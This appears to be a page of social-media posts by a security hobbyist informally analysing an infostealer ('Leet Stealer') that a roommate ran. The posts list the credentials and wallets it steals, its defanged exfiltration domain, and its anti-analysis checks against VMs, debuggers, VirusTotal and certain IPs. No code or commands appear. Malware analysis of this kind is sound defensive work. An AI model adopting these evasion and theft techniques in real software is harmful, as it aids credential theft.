Notices by Foone🏳️‍⚧️ (foone@digipres.club), page 2

@xssfox that's one of the reasons I mainly hack games from the 90s. They don't change, even as the decades do

other debug strings are in portuguese!? this is a very international bit of malware

so this seems to be associated with leetb.iwannaeatcats[.com]

it sends them the data after it steals it. usually suspects: all the passwords out of your browsers, discord & telegram, minecraft & roblox, & any wallet

and Growtopia. I didn't know that game existed, but apparently there's malware out there trying to steal your passwords for it

whenever you find the worst pits of the internet, you will find cloudflare there, quietly making money off it.

it also refuses to run if your external IP is one of a couple, which include a hungarian ISP, a couple IPs in moscow, and azure

it is also apparently dumping these stolen passwords into a discord somewhere, and if it steals your wallet password it dumps it with "🤡 Leet Stealer"

even the bad guys think you're a clown for using cryptocurrency

on a day with no ADHD meds, my roommate knocks on the door and is like "a friend got their discord hacked but before I knew it they sent me an EXE and I ran it. am I hacked?"

seems it is an electron based javascript malware that tries to steal all your passwords from all your browsers

I am some kind of reverse engineer/security engineer but I'm not very good at it WHEN MY BRAIN DOESN'T WORK

huh, one of the things it does is check your RAM speed.

I think because that's a thing real computers have, and it's trying to do a roundabout VM check?

it even checks against OllyDbg, a really great debugger that hasn't updated in 11 years

but yeah it does a bunch of checks to see if anything remotely debuggy or VMy is running or even installed, then refuses to do stuff

I'm looking at this disassembly from dez_ on twitter.

https://gist.github.com/joe-desimone/64b3c1044c184ffc8f26090d7bcd32b5

yes let me accidentally try to unpack the electron app in poland, that's exactly the kind of protection I need: geographic protection

there's a lot of very specific checks before it tries to do anything, I think this has been carefully designed to appear innocuous to the commonly used online sandboxes. like, it detects if it's running on virustotal and throws an error, instead of doing anything sneaky-deaky

god I bet there are some malware out there that checks your location on GPS before running, and errors out if you're too close to Known Antivirus companies

OH GOOD this is a different version that uses aes compression. so the source isn't just obfuscated, it's actually encrypted.

sure there's work-from-home, but you're probably still within a reasonable driving distance of the office. they could just blacklist the entire metropolitan area

I hope these fuckers aren't trying to obfuscate the password by abusing javascript scoping